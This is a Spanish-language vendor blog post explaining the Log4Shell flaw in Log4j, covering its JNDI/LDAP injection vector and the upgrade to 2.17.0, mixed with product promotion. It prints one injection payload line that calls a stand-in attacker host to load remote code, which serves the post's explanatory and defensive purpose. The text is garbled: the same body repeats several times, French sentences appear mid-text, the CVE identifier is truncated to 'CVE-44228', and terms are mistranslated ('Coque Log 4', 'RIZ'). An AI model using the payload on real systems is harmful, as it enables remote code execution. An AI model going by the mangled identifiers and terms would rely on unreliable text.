La vulnerabilidad Log4j explicada: su vector de ataque y cómo prevenirlo
El 9 de diciembre se reveló un exploit de día cero en la biblioteca Java Log4j. CVE-44228, también conocido como Coque Log 4, recibió una calificación de «gravedad alta» porque el exploit puede provocar la ejecución remota de código (RIZ). Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, por lo que pone en peligro a millones de aplicaciones.
¿Quieres mejorar rápidamente tus habilidades enfrentándote a Log4Shell?
Hemos creado una demostración que le lleva desde la idea básica de Log4Shell hasta el descubrimiento de los exploits de esta vulnerabilidad en un simulador llamado Mission. Durante esta misión, le explicaremos cómo la vulnerabilidad Log4j puede afectar a su infraestructura y sus aplicaciones. Haga clic aquí para acceder directamente a la demostración, o siga leyendo para obtener más información sobre esta vulnerabilidad.
¿Noticias viejas?
La hazaña no es nueva. Ya en su conferencia BlackHat 2016, los investigadores en seguridad Álvaro Muñoz y Oleksandr Mirosh destacaron que«las aplicaciones no deben realizar búsquedas JNDI con datos no fiables»e ilustraron cómo una inyección JNDI/LDAP dirigida podía conducir a la ejecución remota de código. Y eso es precisamente lo que está en el centro de Log4Shell.
Vector de ataque
La carga útil de inyección de Log4Shell se parece a esto:
$ {jndi:ldap : //attacker.host/xyz}
Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.
A continuación, está JNDI, o Java Directory and Directory Interface, que es una API que permite conectarse a servicios mediante protocolos como LDAP, DNS, RMI, etc. para recuperar datos o recursos. En términos sencillos, en nuestro ejemplo anterior de carga útil maliciosa, JNDI realiza una búsqueda en el servidor LDAP controlado por el atacante. Su respuesta podría, por ejemplo, apuntar a un archivo de clase Java que contiene código malicioso, que a su vez se ejecutará en el servidor vulnerable.
Lo que hace que esta vulnerabilidad sea tan problemática es que Log4j evalúa todas las entradas del registro y busca todas las entradas de usuario registradas en sintaxis EL con el prefijo «jndi». La carga útil se puede inyectar en cualquier lugar donde los usuarios puedan introducir datos, como los campos de los formularios. Además, los encabezados HTTP, como User Agent y X-Forwarded-Pour, y otros encabezados, se pueden personalizar para transportar la carga útil.
Para descubrir la hazaña por ti mismo, visita nuestro escaparate y pasa a la etapa 2: «El impacto de la experiencia».
Prevención: concienciación
La actualización es la acción recomendada para todas las aplicaciones, ya que Log4j ha corregido el código vulnerable. Sin embargo, las versiones 2.15.0 y 2.16.0 contenían un DDoS y otras vulnerabilidades, lo que significa que, a partir de finales de diciembre, se recomienda actualizar a la versión 2.17.0.
Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos de trabajo o bibliotecas de terceros conlleva riesgos. Debemos ser conscientes de que la seguridad de nuestra aplicación puede verse comprometida por el uso de fuentes externas, que ingenuamente damos por seguras.
¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, los desarrolladores no pueden hacer nada, ya que los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección que hay que aprender es una que se ha repetido en numerosas ocasiones: nunca hay que fiarse de las entradas del usuario.
Secure Code Warrior que los desarrolladores preocupados por la seguridad son la mejor solución para evitar la aparición de vulnerabilidades en el código. Dado que SCW ofrece formación a gran escala específica para el marco de programación, las empresas clientes pudieron localizar rápidamente a los desarrolladores Java pertinentes utilizando los datos de los informes. También se apoyaron en sus expertos en seguridad formados por SCW para acelerar la actualización de Log4j.
Para los desarrolladores Java en particular, Secure Code Warrior Sensei, un complemento gratuito para IntelliJ. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación, así como para prevenir y corregir vulnerabilidades. Puede crear sus propias reglas o utilizar nuestra herramienta lista para usar, el libro de recetas. Participe en nuestras recetas y no olvide descargar nuestro Log4j Recetbook, que le ayudará a localizar y corregir la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.
Mejore sus habilidades en materia de defensa contra Log4Shell
¿Desea poner en práctica lo que ha aprendido en esta entrada del blog? Nuestra vitrina puede ayudarle. Al comienzo de la presentación, obtendrá una visión general rápida de esta vulnerabilidad y, a continuación, se le redirigirá a un entorno simulado donde podrá probar el exploit con instrucciones guiadas.
En diciembre de 2021, se reveló una falla de seguridad crítica llamada Log4Shell en la biblioteca Java Log4j. En este artículo, presentamos la vulnerabilidad Log4Shell de la manera más sencilla para que puedas comprender los conceptos básicos y te proponemos una misión: un campo de pruebas donde puedes intentar explotar un sitio web simulado utilizando el conocimiento de esta vulnerabilidad.
Secure Code Warrior aquí para ayudar a su organización a proteger el código a lo largo de todo el ciclo de desarrollo de software y a crear una cultura en la que la ciberseguridad sea una prioridad. Tanto si es responsable de la seguridad de las aplicaciones, desarrollador, responsable de la seguridad informática o cualquier otra persona involucrada en la seguridad, podemos ayudar a su organización a reducir los riesgos asociados a un código no seguro.
Reserve una demostración
Laura Verheyde est une développeuse de logiciels chez Secure Code Warrior qui se concentre sur la recherche de vulnérabilités et la création de contenu pour les missions et les laboratoires de codage.
El 9 de diciembre se reveló un exploit de día cero en la biblioteca Java Log4j. CVE-44228, también conocido como Coque Log 4, recibió una calificación de «gravedad alta» porque el exploit puede provocar la ejecución remota de código (RIZ). Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, por lo que pone en peligro a millones de aplicaciones.
¿Quieres mejorar rápidamente tus habilidades enfrentándote a Log4Shell?
Hemos creado una demostración que le lleva desde la idea básica de Log4Shell hasta el descubrimiento de los exploits de esta vulnerabilidad en un simulador llamado Mission. Durante esta misión, le explicaremos cómo la vulnerabilidad Log4j puede afectar a su infraestructura y sus aplicaciones. Haga clic aquí para acceder directamente a la demostración, o siga leyendo para obtener más información sobre esta vulnerabilidad.
¿Noticias viejas?
La hazaña no es nueva. Ya en su conferencia BlackHat 2016, los investigadores en seguridad Álvaro Muñoz y Oleksandr Mirosh destacaron que«las aplicaciones no deben realizar búsquedas JNDI con datos no fiables»e ilustraron cómo una inyección JNDI/LDAP dirigida podía conducir a la ejecución remota de código. Y eso es precisamente lo que está en el centro de Log4Shell.
Vector de ataque
La carga útil de inyección de Log4Shell se parece a esto:
$ {jndi:ldap : //attacker.host/xyz}
Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.
A continuación, está JNDI, o Java Directory and Directory Interface, que es una API que permite conectarse a servicios mediante protocolos como LDAP, DNS, RMI, etc. para recuperar datos o recursos. En términos sencillos, en nuestro ejemplo anterior de carga útil maliciosa, JNDI realiza una búsqueda en el servidor LDAP controlado por el atacante. Su respuesta podría, por ejemplo, apuntar a un archivo de clase Java que contiene código malicioso, que a su vez se ejecutará en el servidor vulnerable.
Lo que hace que esta vulnerabilidad sea tan problemática es que Log4j evalúa todas las entradas del registro y busca todas las entradas de usuario registradas en sintaxis EL con el prefijo «jndi». La carga útil se puede inyectar en cualquier lugar donde los usuarios puedan introducir datos, como los campos de los formularios. Además, los encabezados HTTP, como User Agent y X-Forwarded-Pour, y otros encabezados, se pueden personalizar para transportar la carga útil.
Para descubrir la hazaña por ti mismo, visita nuestro escaparate y pasa a la etapa 2: «El impacto de la experiencia».
Prevención: concienciación
La actualización es la acción recomendada para todas las aplicaciones, ya que Log4j ha corregido el código vulnerable. Sin embargo, las versiones 2.15.0 y 2.16.0 contenían un DDoS y otras vulnerabilidades, lo que significa que, a partir de finales de diciembre, se recomienda actualizar a la versión 2.17.0.
Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos de trabajo o bibliotecas de terceros conlleva riesgos. Debemos ser conscientes de que la seguridad de nuestra aplicación puede verse comprometida por el uso de fuentes externas, que ingenuamente damos por seguras.
¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, los desarrolladores no pueden hacer nada, ya que los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección que hay que aprender es una que se ha repetido en numerosas ocasiones: nunca hay que fiarse de las entradas del usuario.
Secure Code Warrior que los desarrolladores preocupados por la seguridad son la mejor solución para evitar la aparición de vulnerabilidades en el código. Dado que SCW ofrece formación a gran escala específica para el marco de programación, las empresas clientes pudieron localizar rápidamente a los desarrolladores Java pertinentes utilizando los datos de los informes. También se apoyaron en sus expertos en seguridad formados por SCW para acelerar la actualización de Log4j.
Para los desarrolladores Java en particular, Secure Code Warrior Sensei, un complemento gratuito para IntelliJ. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación, así como para prevenir y corregir vulnerabilidades. Puede crear sus propias reglas o utilizar nuestra herramienta lista para usar, el libro de recetas. Participe en nuestras recetas y no olvide descargar nuestro Log4j Recetbook, que le ayudará a localizar y corregir la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.
Mejore sus habilidades en materia de defensa contra Log4Shell
¿Desea poner en práctica lo que ha aprendido en esta entrada del blog? Nuestra vitrina puede ayudarle. Al comienzo de la presentación, obtendrá una visión general rápida de esta vulnerabilidad y, a continuación, se le redirigirá a un entorno simulado donde podrá probar el exploit con instrucciones guiadas.
El 9 de diciembre se reveló un exploit de día cero en la biblioteca Java Log4j. CVE-44228, también conocido como Coque Log 4, recibió una calificación de «gravedad alta» porque el exploit puede provocar la ejecución remota de código (RIZ). Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, por lo que pone en peligro a millones de aplicaciones.
¿Quieres mejorar rápidamente tus habilidades enfrentándote a Log4Shell?
Hemos creado una demostración que le lleva desde la idea básica de Log4Shell hasta el descubrimiento de los exploits de esta vulnerabilidad en un simulador llamado Mission. Durante esta misión, le explicaremos cómo la vulnerabilidad Log4j puede afectar a su infraestructura y sus aplicaciones. Haga clic aquí para acceder directamente a la demostración, o siga leyendo para obtener más información sobre esta vulnerabilidad.
¿Noticias viejas?
La hazaña no es nueva. Ya en su conferencia BlackHat 2016, los investigadores en seguridad Álvaro Muñoz y Oleksandr Mirosh destacaron que«las aplicaciones no deben realizar búsquedas JNDI con datos no fiables»e ilustraron cómo una inyección JNDI/LDAP dirigida podía conducir a la ejecución remota de código. Y eso es precisamente lo que está en el centro de Log4Shell.
Vector de ataque
La carga útil de inyección de Log4Shell se parece a esto:
$ {jndi:ldap : //attacker.host/xyz}
Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.
A continuación, está JNDI, o Java Directory and Directory Interface, que es una API que permite conectarse a servicios mediante protocolos como LDAP, DNS, RMI, etc. para recuperar datos o recursos. En términos sencillos, en nuestro ejemplo anterior de carga útil maliciosa, JNDI realiza una búsqueda en el servidor LDAP controlado por el atacante. Su respuesta podría, por ejemplo, apuntar a un archivo de clase Java que contiene código malicioso, que a su vez se ejecutará en el servidor vulnerable.
Lo que hace que esta vulnerabilidad sea tan problemática es que Log4j evalúa todas las entradas del registro y busca todas las entradas de usuario registradas en sintaxis EL con el prefijo «jndi». La carga útil se puede inyectar en cualquier lugar donde los usuarios puedan introducir datos, como los campos de los formularios. Además, los encabezados HTTP, como User Agent y X-Forwarded-Pour, y otros encabezados, se pueden personalizar para transportar la carga útil.
Para descubrir la hazaña por ti mismo, visita nuestro escaparate y pasa a la etapa 2: «El impacto de la experiencia».
Prevención: concienciación
La actualización es la acción recomendada para todas las aplicaciones, ya que Log4j ha corregido el código vulnerable. Sin embargo, las versiones 2.15.0 y 2.16.0 contenían un DDoS y otras vulnerabilidades, lo que significa que, a partir de finales de diciembre, se recomienda actualizar a la versión 2.17.0.
Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos de trabajo o bibliotecas de terceros conlleva riesgos. Debemos ser conscientes de que la seguridad de nuestra aplicación puede verse comprometida por el uso de fuentes externas, que ingenuamente damos por seguras.
¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, los desarrolladores no pueden hacer nada, ya que los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección que hay que aprender es una que se ha repetido en numerosas ocasiones: nunca hay que fiarse de las entradas del usuario.
Secure Code Warrior que los desarrolladores preocupados por la seguridad son la mejor solución para evitar la aparición de vulnerabilidades en el código. Dado que SCW ofrece formación a gran escala específica para el marco de programación, las empresas clientes pudieron localizar rápidamente a los desarrolladores Java pertinentes utilizando los datos de los informes. También se apoyaron en sus expertos en seguridad formados por SCW para acelerar la actualización de Log4j.
Para los desarrolladores Java en particular, Secure Code Warrior Sensei, un complemento gratuito para IntelliJ. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación, así como para prevenir y corregir vulnerabilidades. Puede crear sus propias reglas o utilizar nuestra herramienta lista para usar, el libro de recetas. Participe en nuestras recetas y no olvide descargar nuestro Log4j Recetbook, que le ayudará a localizar y corregir la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.
Mejore sus habilidades en materia de defensa contra Log4Shell
¿Desea poner en práctica lo que ha aprendido en esta entrada del blog? Nuestra vitrina puede ayudarle. Al comienzo de la presentación, obtendrá una visión general rápida de esta vulnerabilidad y, a continuación, se le redirigirá a un entorno simulado donde podrá probar el exploit con instrucciones guiadas.
Haga clic en el enlace siguiente y descargue el PDF de este recurso.
Secure Code Warrior aquí para ayudar a su organización a proteger el código a lo largo de todo el ciclo de desarrollo de software y a crear una cultura en la que la ciberseguridad sea una prioridad. Tanto si es responsable de la seguridad de las aplicaciones, desarrollador, responsable de la seguridad informática o cualquier otra persona involucrada en la seguridad, podemos ayudar a su organización a reducir los riesgos asociados a un código no seguro.
Mostrar el informeReserve una demostración
Laura Verheyde est une développeuse de logiciels chez Secure Code Warrior qui se concentre sur la recherche de vulnérabilités et la création de contenu pour les missions et les laboratoires de codage.
El 9 de diciembre se reveló un exploit de día cero en la biblioteca Java Log4j. CVE-44228, también conocido como Coque Log 4, recibió una calificación de «gravedad alta» porque el exploit puede provocar la ejecución remota de código (RIZ). Además, log4j-core es una de las bibliotecas de registro Java más utilizadas, por lo que pone en peligro a millones de aplicaciones.
¿Quieres mejorar rápidamente tus habilidades enfrentándote a Log4Shell?
Hemos creado una demostración que le lleva desde la idea básica de Log4Shell hasta el descubrimiento de los exploits de esta vulnerabilidad en un simulador llamado Mission. Durante esta misión, le explicaremos cómo la vulnerabilidad Log4j puede afectar a su infraestructura y sus aplicaciones. Haga clic aquí para acceder directamente a la demostración, o siga leyendo para obtener más información sobre esta vulnerabilidad.
¿Noticias viejas?
La hazaña no es nueva. Ya en su conferencia BlackHat 2016, los investigadores en seguridad Álvaro Muñoz y Oleksandr Mirosh destacaron que«las aplicaciones no deben realizar búsquedas JNDI con datos no fiables»e ilustraron cómo una inyección JNDI/LDAP dirigida podía conducir a la ejecución remota de código. Y eso es precisamente lo que está en el centro de Log4Shell.
Vector de ataque
La carga útil de inyección de Log4Shell se parece a esto:
$ {jndi:ldap : //attacker.host/xyz}
Pour comprendre cela, nous devons connaître le langage d'expression Java (EL). Expressions écrites dans la syntaxe suivante : $ {expr} sera évalué lors de l'exécution. Par exemple, $ {java:version} renverra la version Java utilisée.
A continuación, está JNDI, o Java Directory and Directory Interface, que es una API que permite conectarse a servicios mediante protocolos como LDAP, DNS, RMI, etc. para recuperar datos o recursos. En términos sencillos, en nuestro ejemplo anterior de carga útil maliciosa, JNDI realiza una búsqueda en el servidor LDAP controlado por el atacante. Su respuesta podría, por ejemplo, apuntar a un archivo de clase Java que contiene código malicioso, que a su vez se ejecutará en el servidor vulnerable.
Lo que hace que esta vulnerabilidad sea tan problemática es que Log4j evalúa todas las entradas del registro y busca todas las entradas de usuario registradas en sintaxis EL con el prefijo «jndi». La carga útil se puede inyectar en cualquier lugar donde los usuarios puedan introducir datos, como los campos de los formularios. Además, los encabezados HTTP, como User Agent y X-Forwarded-Pour, y otros encabezados, se pueden personalizar para transportar la carga útil.
Para descubrir la hazaña por ti mismo, visita nuestro escaparate y pasa a la etapa 2: «El impacto de la experiencia».
Prevención: concienciación
La actualización es la acción recomendada para todas las aplicaciones, ya que Log4j ha corregido el código vulnerable. Sin embargo, las versiones 2.15.0 y 2.16.0 contenían un DDoS y otras vulnerabilidades, lo que significa que, a partir de finales de diciembre, se recomienda actualizar a la versión 2.17.0.
Como desarrolladores que escribimos código, siempre debemos tener en cuenta la seguridad. Log4Shell nos ha enseñado que el uso de marcos de trabajo o bibliotecas de terceros conlleva riesgos. Debemos ser conscientes de que la seguridad de nuestra aplicación puede verse comprometida por el uso de fuentes externas, que ingenuamente damos por seguras.
¿Se podría haber evitado esta vulnerabilidad? Sí y no. Por un lado, los desarrolladores no pueden hacer nada, ya que los componentes vulnerables se introducen a través de software de terceros. Por otro lado, la lección que hay que aprender es una que se ha repetido en numerosas ocasiones: nunca hay que fiarse de las entradas del usuario.
Secure Code Warrior que los desarrolladores preocupados por la seguridad son la mejor solución para evitar la aparición de vulnerabilidades en el código. Dado que SCW ofrece formación a gran escala específica para el marco de programación, las empresas clientes pudieron localizar rápidamente a los desarrolladores Java pertinentes utilizando los datos de los informes. También se apoyaron en sus expertos en seguridad formados por SCW para acelerar la actualización de Log4j.
Para los desarrolladores Java en particular, Secure Code Warrior Sensei, un complemento gratuito para IntelliJ. Esta herramienta de análisis de código basada en reglas se puede utilizar para aplicar directrices de codificación, así como para prevenir y corregir vulnerabilidades. Puede crear sus propias reglas o utilizar nuestra herramienta lista para usar, el libro de recetas. Participe en nuestras recetas y no olvide descargar nuestro Log4j Recetbook, que le ayudará a localizar y corregir la vulnerabilidad Log4Shell en un abrir y cerrar de ojos.
Mejore sus habilidades en materia de defensa contra Log4Shell
¿Desea poner en práctica lo que ha aprendido en esta entrada del blog? Nuestra vitrina puede ayudarle. Al comienzo de la presentación, obtendrá una visión general rápida de esta vulnerabilidad y, a continuación, se le redirigirá a un entorno simulado donde podrá probar el exploit con instrucciones guiadas.
Índice
Secure Code Warrior aquí para ayudar a su organización a proteger el código a lo largo de todo el ciclo de desarrollo de software y a crear una cultura en la que la ciberseguridad sea una prioridad. Tanto si es responsable de la seguridad de las aplicaciones, desarrollador, responsable de la seguridad informática o cualquier otra persona involucrada en la seguridad, podemos ayudar a su organización a reducir los riesgos asociados a un código no seguro.
Reserve una demostraciónDescargarRecursos para ayudarle a empezar
Temas y contenidos de formación sobre el código seguro
Nuestro contenido de vanguardia evoluciona constantemente para adaptarse al panorama en constante cambio del desarrollo de software, teniendo en cuenta su función. Temas que abarcan desde la IA hasta la inyección de XQuery, ofrecidos para una variedad de puestos, desde arquitectos hasta ingenieros, pasando por jefes de producto y control de calidad. Descubra una visión general de lo que nuestro catálogo de contenidos tiene para ofrecer por tema y por función.
La Cámara de Comercio establece el estándar para la seguridad impulsada por desarrolladores a gran escala
Kamer van Koophandel comparte cómo ha integrado la codificación segura en el desarrollo diario mediante certificaciones basadas en roles, evaluaciones comparativas de Trust Score y una cultura de responsabilidad compartida en materia de seguridad.
%20(1).avif)
.avif)
Modelado de amenazas con IA: convertir a cada desarrollador en un modelador de amenazas
Saldrá mejor equipado para ayudar a los desarrolladores a combinar ideas y técnicas de modelado de amenazas con las herramientas de IA que ya utilizan para reforzar la seguridad, mejorar la colaboración y crear software más resistente desde el principio.
Recursos para ayudarle a empezar
Cybermon está de vuelta: las missions Beat the Boss ya están disponibles bajo demanda.
Cybermon 2025 Beat the Boss ya está disponible todo el año en SCW. Implemente desafíos de seguridad avanzados relacionados con la IA y el LLM para reforzar el desarrollo seguro de la IA a gran escala.
Explicación de la ley sobre ciberresiliencia: lo que significa para el desarrollo de software seguro desde el diseño.
Descubra qué exige la ley europea sobre ciberresiliencia (CRA), a quién se aplica y cómo los equipos de ingenieros pueden prepararse mediante prácticas de seguridad desde el diseño, la prevención de vulnerabilidades y el refuerzo de las capacidades de los desarrolladores.
Facilitador 1: Criterios de éxito definidos y medibles
El facilitador 1 da inicio a nuestra serie de 10 partes titulada «Facilitadores del éxito», mostrando cómo combinar la codificación segura con resultados comerciales, como la reducción de riesgos y la rapidez, para garantizar la madurez a largo plazo de los programas.
